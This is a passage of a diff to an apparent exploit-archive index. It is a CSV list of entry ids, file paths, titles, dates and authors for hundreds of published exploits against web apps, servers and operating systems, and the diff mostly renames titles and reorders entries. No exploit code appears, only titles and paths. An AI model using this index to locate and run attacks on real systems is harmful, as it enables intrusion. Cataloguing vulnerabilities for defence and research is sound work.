1.0,Netscape Server 1.0/1.12,OReilly WebSite Professional 1.1 b BAT/.CMD Remote Command Execution",1996-03-01,anonymous,windows,remote,0 +20445,platforms/windows/remote/20445.txt,"IIS 1.0_Netscape Server 1.0/1.12_OReilly WebSite Professional 1.1 b BAT/.CMD Remote Command Execution",1996-03-01,anonymous,windows,remote,0 20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x convert.bas Vulnerability",1996-07-03,"TTT Group",cgi,remote,0 20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 and WebGlimpse 1.0 Piped Command Vulnerability",1996-07-03,"Razvan Dragomirescu",unix,remote,0 20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 Password Disclosure Vulnerability",2000-11-30,"Michael R. Rudel",multiple,remote,0 -20451,platforms/windows/local/20451.c,"Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_displayparamstmt Buffer Overflow Vulnerability",2000-12-01,"David Litchfield",windows,local,0 +20451,platforms/windows/local/20451.c,"Microsoft SQL Server 7.0/2000_Data Engine 1.0/2000 xp_displayparamstmt Buffer Overflow Vulnerability",2000-12-01,"David Litchfield",windows,local,0 20452,platforms/aix/local/20452.c,"IBM AIX 4.x setsenv Buffer Overflow Vulnerability",2000-12-01,"Last Stage of Delirium",aix,local,0 20453,platforms/aix/local/20453.c,"IBM AIX 4.3 digest Buffer Overflow Vulnerability",2000-12-01,"Last Stage of Delirium",aix,local,0 20454,platforms/aix/local/20454.sh,"IBM AIX 4.x enq Buffer Overflow Vulnerability",2003-04-24,watercloud,aix,local,0 20455,platforms/aix/local/20455.c,"IBM AIX 4.3.x piobe Buffer Overflow Vulnerability",2000-12-01,"Last Stage of Delirium",aix,local,0 -20456,platforms/windows/local/20456.c,"Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_showcolv Buffer Overflow Vulnerability",2000-12-01,"David Litchfield",windows,local,0 -20457,platforms/windows/local/20457.c,"Microsoft SQL Server 7.0/2000,Data Engine 1.0/2000 xp_peekqueue Buffer Overflow Vulnerability",2000-12-01,@stake,windows,local,0 +20456,platforms/windows/local/20456.c,"Microsoft SQL Server 7.0/2000_Data Engine 1.0/2000 xp_showcolv Buffer Overflow Vulnerability",2000-12-01,"David Litchfield",windows,local,0 +20457,platforms/windows/local/20457.c,"Microsoft SQL Server 7.0/2000_Data Engine 1.0/2000 xp_peekqueue Buffer Overflow Vulnerability",2000-12-01,@stake,windows,local,0 20458,platforms/linux/local/20458.txt,"Linux Kernel 2.2.x Non-Readable File Ptrace Vulnerability",2000-11-30,"Lamagra Argamal",linux,local,0 20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 \'INPUT TYPE=FILE\' Vulnerability",2000-12-01,Key,windows,remote,0 20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0 @@ -17763,8 +17795,9 @@ id,file,description,date,author,platform,type,port 20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 Information Disclosure Vulnerability",2000-12-05,"china nsl",multiple,remote,0 20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0.x - Remote Arbitrary Command Execution Vulnerability",2000-12-06,"Secure Reality Advisories",unix,remote,0 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL DoS Vulnerability",2000-12-05,benjurry,windows,dos,0 +21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 20472,platforms/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password Vulnerability",2000-12-05,benjurry,multiple,remote,0 -20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x,Catalyst 5000 4.5/5.x,Catalyst 6000 5.x Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0 +20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x_Catalyst 5000 4.5/5.x_Catalyst 6000 5.x Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0 20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 - Persistent XSS",2012-08-13,"Chris Kellum",php,webapps,0 20476,platforms/php/webapps/20476.txt,"Hotel Booking Portal 0.1 - Multiple Vulnerabilities",2012-08-13,"Yakir Wizman",php,webapps,0 20477,platforms/windows/webapps/20477.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway CSRF Vulnerability",2012-08-13,"Nir Valtman",windows,webapps,0 @@ -17787,7 +17820,6 @@ id,file,description,date,author,platform,type,port 20495,platforms/unix/remote/20495.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (1)",2000-12-11,CyRaX,unix,remote,0 20496,platforms/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (2)",2000-12-07,diman,linux,remote,0 20497,platforms/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution Vulnerability",2000-12-11,rpc,cgi,remote,0 -20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload Vulnerability",2012-08-15,metasploit,php,remote,0 20501,platforms/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection",2012-08-15,metasploit,windows,remote,7879 20502,platforms/java/remote/20502.rb,"Novell ZENworks Asset Management Remote Execution",2012-08-15,metasploit,java,remote,8080 20503,platforms/cgi/remote/20503.html,"Leif M. Wright simplestmail.cgi 1.0 - Remote Command Execution Vulnerability",2000-12-11,rpc,cgi,remote,0 @@ -17827,9 +17859,10 @@ id,file,description,date,author,platform,type,port 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0 20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload Vulnerability",2012-08-15,ICheer_No0M,php,webapps,0 +20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change (MSF)",2012-08-21,Kc57,linux,webapps,0 20541,platforms/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,php,webapps,0 -20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,metasploit,windows,local,0 -20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,metasploit,windows,local,0 +20705,platforms/multiple/dos/20705.py,"sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 +20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0 20544,platforms/php/webapps/20544.txt,"xt:Commerce <= 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0 @@ -17837,7 +17870,7 @@ id,file,description,date,author,platform,type,port 20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Stored XSS",2012-08-16,"Shai rod",php,webapps,0 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - CSRF Vulnerability",2012-08-16,DaOne,php,webapps,0 20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) Remote Execution",2012-08-16,iJoo,linux,remote,0 -20552,platforms/windows/dos/20552.html,"Internet Explorer 4.0,Outlook 2000/5.5 MSHTML.DLL Crash Vulnerability",2001-01-15,"Thor Larholm",windows,dos,0 +20552,platforms/windows/dos/20552.html,"Internet Explorer 4.0_Outlook 2000/5.5 MSHTML.DLL Crash Vulnerability",2001-01-15,"Thor Larholm",windows,dos,0 20553,platforms/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - (.wmz) Arbitrary Java Applet Vulnerability",2001-01-15,"Georgi Guninski",windows,remote,0 20554,platforms/linux/local/20554.sh,"SuSE 6.x/7.0 MkDir Error Handling rctab Race Condition Vulnerability (1)",2001-01-13,IhaQueR,linux,local,0 20555,platforms/linux/local/20555.sh,"SuSE 6.x/7.0 MkDir Error Handling rctab Race Condition Vulnerability (2)",2001-01-13,IhaQueR,linux,local,0 @@ -17860,10 +17893,13 @@ id,file,description,date,author,platform,type,port 20573,platforms/php/webapps/20573.html,"Jaow CMS 2.3 - CSRF Vulnerability",2012-08-17,DaOne,php,webapps,0 20574,platforms/php/webapps/20574.txt,"Social Engine 4.2.5 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,php,webapps,0 20575,platforms/windows/webapps/20575.txt,"ManageEngine OpStor 7.4 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,windows,webapps,0 +20613,platforms/windows/dos/20613.txt,"Microsoft Windows 98/2000 UDP Socket DoS Vulnerability",2001-02-06,"Georgi Guninski",windows,dos,0 20576,platforms/php/webapps/20576.txt,"Inferno vBShout <= 2.5.2 - SQL Injection",2012-08-17,Luit,php,webapps,0 +20644,platforms/hardware/dos/20644.c,"Marconi ASX-1000 Administration Denial of Service Vulnerability",2001-02-19,"J.K. Garvey",hardware,dos,0 20578,platforms/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Stored XSS",2012-08-17,"Shai rod",php,webapps,0 20579,platforms/php/webapps/20579.py,"T-dah Webmail Multiple Stored XSS",2012-08-17,"Shai rod",php,webapps,0 20580,platforms/php/webapps/20580.txt,"webid <= 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 +20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal Vulnerability",2001-02-05,joetesta,windows,remote,0 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow Vulnerability",2001-01-18,"Luis Miguel Silva",linux,local,0 20582,platforms/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 print_client() Format String Vulnerability",2001-01-21,CyRaX,windows,remote,0 20583,platforms/cgi/remote/20583.pl,"textcounter.pl 1.2 - Arbitrary Command Execution Vulnerability",1998-06-24,"Doru Petrescu",cgi,remote,0 @@ -17878,7 +17914,7 @@ id,file,description,date,author,platform,type,port 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 JSP/JSPSQL Remote File Reading Vulnerability",2000-01-22,"Georgi Guninski",jsp,remote,0 20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x ipfw Filtering Evasion Vulnerability",2001-01-23,"Aragon Gouveia",freebsd,remote,0 20594,platforms/unix/remote/20594.txt,"Wu-Ftpd 2.4.2/2.5/2.6 Debug Mode Client Hostname Format String Vulnerability",2001-01-23,"Wu-ftpd team",unix,remote,0 -20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability",1999-09-25,anonymous,multiple,remote,0 +20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5_Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability",1999-09-25,anonymous,multiple,remote,0 20596,platforms/windows/dos/20596.c,"Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability",2001-01-24,"Arne Vidstrom",windows,dos,0 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 lists Command Execution Vulnerability",1994-06-06,"Razvan Dragomirescu",linux,remote,0 20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQLi Vulnerability",2012-08-17,loneferret,php,webapps,0 @@ -17887,7 +17923,7 @@ id,file,description,date,author,platform,type,port 20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal Vulnerability",2001-01-28,"MC GaN",multiple,remote,0 20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 nlps_server Buffer Overflow Vulnerability",1998-04-01,"Last Stage of Delirium",solaris,remote,0 20603,platforms/solaris/local/20603.c,"Solaris 7/8 ximp40 Library Buffer Overflow Vulnerability",2001-01-31,UNYUN,solaris,local,0 -20604,platforms/linux/local/20604.sh,"Debian 2.2,S.u.S.E 6.3/6.4/7.0 man -l Format String Vulnerability",2001-01-31,IhaQueR,linux,local,0 +20604,platforms/linux/local/20604.sh,"Debian 2.2_S.u.S.E 6.3/6.4/7.0 man -l Format String Vulnerability",2001-01-31,IhaQueR,linux,local,0 20605,platforms/windows/remote/20605.cpp,"Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability",2012-08-18,UNYUN,windows,remote,0 20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow Vulnerability",2000-03-26,"Jin Ho You",cgi,remote,0 20607,platforms/windows/remote/20607.txt,"goahead webserver 2.0/2.1 - Directory Traversal Vulnerability",2001-02-02,"Sergey Nenashev",windows,remote,0 @@ -17895,8 +17931,6 @@ id,file,description,date,author,platform,type,port 20609,platforms/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 Path Disclosure Vulnerability",2001-02-04,"Joe Testa",cgi,remote,0 20610,platforms/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet DoS Vulnerability",2000-10-31,"Allaire Security",multiple,dos,0 20611,platforms/cgi/remote/20611.txt,"anaconda foundation 1.4-1.9 - Directory Traversal Vulnerability",2000-10-13,pestilence,cgi,remote,0 -20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal Vulnerability",2001-02-05,joetesta,windows,remote,0 -20613,platforms/windows/dos/20613.txt,"Microsoft Windows 98/2000 UDP Socket DoS Vulnerability",2001-02-06,"Georgi Guninski",windows,dos,0 20614,platforms/windows/remote/20614.txt,"aolserver 3.2 Win32 - Directory Traversal Vulnerability",2001-02-06,joetesta,windows,remote,0 20615,platforms/unix/remote/20615.txt,"SSH 1.2.30 Daemon Logging Failure Vulnerability",2001-02-05,"Jose Nazario",unix,remote,0 20616,platforms/windows/remote/20616.txt,"soft lite serverworx 3.0 - Directory Traversal Vulnerability",2001-02-07,joetesta,windows,remote,0 @@ -17927,7 +17961,6 @@ id,file,description,date,author,platform,type,port 20641,platforms/windows/dos/20641.txt,"Working Resources BadBlue 1.2.7 DoS Vulnerability",2001-02-20,"SNS Research",windows,dos,0 20642,platforms/cgi/remote/20642.pl,"Adcycle 0.77/0.78 AdLibrary.pm Session Access Vulnerability",2001-02-19,"Neil K",cgi,remote,0 20643,platforms/windows/webapps/20643.txt,"ManageEngine OpUtils 6.0 - Stored XSS",2012-08-18,loneferret,windows,webapps,7080 -20644,platforms/hardware/dos/20644.c,"Marconi ASX-1000 Administration Denial of Service Vulnerability",2001-02-19,"J.K. Garvey",hardware,dos,0 20645,platforms/linux/local/20645.c,"Elm 2.5.3 Alternative-Folder Buffer Overflow Vulnerability",2001-02-13,_kiss_,linux,local,0 20646,platforms/unix/remote/20646.c,"LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow Vulnerability",2000-12-26,"Stan Bubrouski",unix,remote,0 20647,platforms/windows/remote/20647.c,"Atrium Software Mercur Mail Server 3.3 EXPN Buffer Overflow Vulnerability",2001-02-23,"Martin Rakhmanoff",windows,remote,0 @@ -17953,9 +17986,13 @@ id,file,description,date,author,platform,type,port 20667,platforms/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Password Disclosure",2012-08-20,"Alberto Ortega",hardware,webapps,0 20668,platforms/java/webapps/20668.py,"hupa webmail 0.0.2 - Stored XSS",2012-08-20,"Shai rod",java,webapps,0 20669,platforms/php/webapps/20669.py,"GWebmail 0.7.3 - XSS & LFI RCE Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 +20709,platforms/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Password Change CSRF",2012-08-22,"Shai rod",php,webapps,0 +20710,platforms/php/webapps/20710.html,"VamCart 0.9 - CSRF Vulnerability",2012-08-22,DaOne,php,webapps,0 +20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",2012-08-22,metasploit,cgi,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro CSRF Vulnerability",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail Multiple Stored XSS Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 +20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Stored XSS",2012-08-20,"Shai rod",php,webapps,0 20676,platforms/windows/remote/20676.rb,"Sysax Multi-Server 5.64 Create Folder Buffer Overflow",2012-08-20,"Matt Andreko",windows,remote,0 20677,platforms/windows/webapps/20677.txt,"IOServer ""Root Directory"" Trailing Backslash Multiple Vulnerabilities",2012-08-20,hinge,windows,webapps,0 @@ -17971,7 +18008,7 @@ id,file,description,date,author,platform,type,port 20687,platforms/windows/remote/20687.txt,"OReilly Software WebSite Professional 2.5.4 - Directory Disclosure Vulnerability",2001-03-16,"Roberto Moreno",windows,remote,0 20688,platforms/windows/remote/20688.txt,"Qualcomm Eudora 5.0.2 - 'Use Microsoft Viewer' Code Execution Vulnerability",2001-03-18,http-equiv,windows,remote,0 20689,platforms/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 s.cgi Buffer Overflow Vulnerability",2001-03-19,teleh0r,cgi,remote,0 -20690,platforms/linux/remote/20690.sh,"wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability",2001-03-15,"Frank DENIS",linux,remote,0 +20690,platforms/linux/remote/20690.sh,"wu-ftpd 2.4/2.5/2.6_Trolltech ftpd 1.2_ProFTPD 1.2_BeroFTPD 1.3.4 FTP glob Expansion Vulnerability",2001-03-15,"Frank DENIS",linux,remote,0 20691,platforms/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 mount Buffer Overflow Vulnerability",2001-03-13,"Frank DENIS",linux,local,0 20692,platforms/multiple/remote/20692.pl,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)",2001-06-13,rfp,multiple,remote,0 20693,platforms/multiple/remote/20693.c,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)",2002-02-21,st0ic,multiple,remote,0 @@ -17979,23 +18016,16 @@ id,file,description,date,author,platform,type,port 20695,platforms/multiple/remote/20695.pl,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)",2001-06-13,farm9,multiple,remote,0 20696,platforms/windows/dos/20696.txt,"Alt-N MDaemon 3.5.6/5.0.7/6.x IMAP DoS Vulnerability",2001-03-23,nitr0s,windows,dos,0 20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability",2001-03-19,"Luciano Rocha",unix,local,0 -20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0 -20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 -20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0 -20705,platforms/multiple/dos/20705.py,"sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 -20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change (MSF)",2012-08-21,Kc57,linux,webapps,0 20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi Vulnerability",2012-08-21,loneferret,php,webapps,0 -20709,platforms/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Password Change CSRF",2012-08-22,"Shai rod",php,webapps,0 -20710,platforms/php/webapps/20710.html,"VamCart 0.9 - CSRF Vulnerability",2012-08-22,DaOne,php,webapps,0 -20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",2012-08-22,metasploit,cgi,webapps,0 -20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0 +20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0 +20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal Vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File Vulnerability",2001-03-23,KimYongJun,solaris,local,0 20716,platforms/windows/remote/20716.txt,"apache tomcat 3.0 - Directory Traversal Vulnerability",2001-03-28,lovehacker,windows,remote,0 20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal Vulnerability",2001-03-23,"Erik Tayler",windows,remote,0 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting Vulnerability",2001-03-18,lesha,unix,local,0 -20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0,Weblogic Server 5.1 URL JSP Request Source Code Disclosure Vulnerability",2001-03-28,"Sverre H. Huseby",multiple,remote,0 +20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0_Weblogic Server 5.1 URL JSP Request Source Code Disclosure Vulnerability",2001-03-28,"Sverre H. Huseby",multiple,remote,0 20720,platforms/linux/local/20720.c,"Linux kernel <= 2.2.18 - ptrace/execve Race Condition Vulnerability (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 20721,platforms/linux/local/20721.c,"Linux kernel <= 2.2.18 - ptrace/execve Race Condition Vulnerability (2)",2001-03-27,"Wojciech Purczynski",linux,local,0 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure Vulnerability",2001-04-03,lovehacker,multiple,remote,0 @@ -18007,7 +18037,7 @@ id,file,description,date,author,platform,type,port 20728,platforms/windows/remote/20728.txt,"602Pro Lan Suite 2000a Long HTTP Request Denial of Service Vulnerability",2001-04-05,nitr0s,windows,remote,0 20729,platforms/php/webapps/20729.txt,"PHP Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability",2001-04-02,"Juan Diego",php,webapps,0 20730,platforms/unix/remote/20730.c,"IPFilter 3.x Fragment Rule Bypass Vulnerability",2001-04-09,"Thomas Lopatic",unix,remote,0 -20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2,NetBSD 1.2-4.5,OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 +20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x-2.8 ftpd glob() Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0 20734,platforms/hardware/remote/20734.sh,"Cisco PIX 4.x/5.x TACACS+ Denial of Service Vulnerability",2001-04-06,"Claudiu Calomfirescu",hardware,remote,0 @@ -18030,15 +18060,16 @@ id,file,description,date,author,platform,type,port 20751,platforms/solaris/local/20751.txt,"Solaris 7.0/8 IPCS Timezone Buffer Overflow Vulnerability",2001-04-12,"Riley Hassell",solaris,local,0 20752,platforms/cgi/remote/20752.txt,"NCM Content Management System content.pl Input Validation Vulnerability",2001-04-13,"RA-Soft Security",cgi,remote,0 20753,platforms/cgi/remote/20753.txt,"IBM Websphere/Net.Commerce 3 CGI-BIN Macro Denial of Service Vulnerability",2001-04-13,"ET LoWNOISE",cgi,remote,0 -20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 - Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0 -20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 -20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 20761,platforms/php/webapps/20761.txt,"Ad Manager Pro 4 - LFI",2012-08-23,CorryL,php,webapps,0 20762,platforms/php/webapps/20762.php,"webpa <= 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 20763,platforms/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy DoS Vulnerability",2001-04-16,"SecureXpert Labs",windows,dos,0 +20944,platforms/windows/remote/20944.rb,"SAP NetWeaver HostControl Command Injection",2012-08-31,metasploit,windows,remote,0 +20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 - Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0 +20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 +20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 FTP Core Dump Shadow Password Recovery Vulnerability",2001-04-17,warning3,solaris,remote,0 20765,platforms/linux/remote/20765.pl,"Linux kernel 2.4 IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0 -20766,platforms/unix/local/20766.c,"SGI IRIX 6.5,Solaris 7.0/8 CDE dtsession Buffer Overflow Vulnerability",2001-04-11,"Last Stage of Delirium",unix,local,0 +20766,platforms/unix/local/20766.c,"SGI IRIX 6.5_Solaris 7.0/8 CDE dtsession Buffer Overflow Vulnerability",2001-04-11,"Last Stage of Delirium",unix,local,0 20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0 20768,platforms/solaris/local/20768.c,"Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (2)",1999-12-01,"Last Stage of Delirium",solaris,local,0 20769,platforms/unix/local/20769.txt,"Siemens Reliant UNIX 5.4 ppd -T Race Condition Vulnerability",2001-04-14,"Ruiz Garcia",unix,local,0 @@ -18076,16 +18107,16 @@ id,file,description,date,author,platform,type,port 20802,platforms/windows/remote/20802.c,"Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability",1997-06-21,"Andrea Arcangeli",windows,remote,0 20803,platforms/windows/remote/20803.txt,"raidenftpd 2.1 - Directory Traversal Vulnerability",2001-04-25,joetesta,windows,remote,0 20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage Vulnerability",2001-04-26,V9,irix,local,0 -20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6,OpenLinux 1.0/1.1 - routed traceon Vulnerability",1998-10-21,Rootshell,irix,remote,0 +20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6_OpenLinux 1.0/1.1 - routed traceon Vulnerability",1998-10-21,Rootshell,irix,remote,0 20806,platforms/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 Network Printer Administration Interface Vulnerability",2001-04-25,Ltlw0lf,hardware,remote,0 20807,platforms/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal Vulnerability",2001-04-27,joetesta,multiple,remote,0 20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x - Directory Traversal Vulnerability",2001-04-27,ThePike,cgi,remote,0 20809,platforms/cgi/remote/20809.html,"Excite for Web Servers 1.1 Administrative Password Vulnerability",1998-11-30,"Michael Gerdts",cgi,remote,0 -20810,platforms/multiple/remote/20810.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,remote,0 -20811,platforms/multiple/remote/20811.cpp,"FreeBSD 2.x,HP-UX 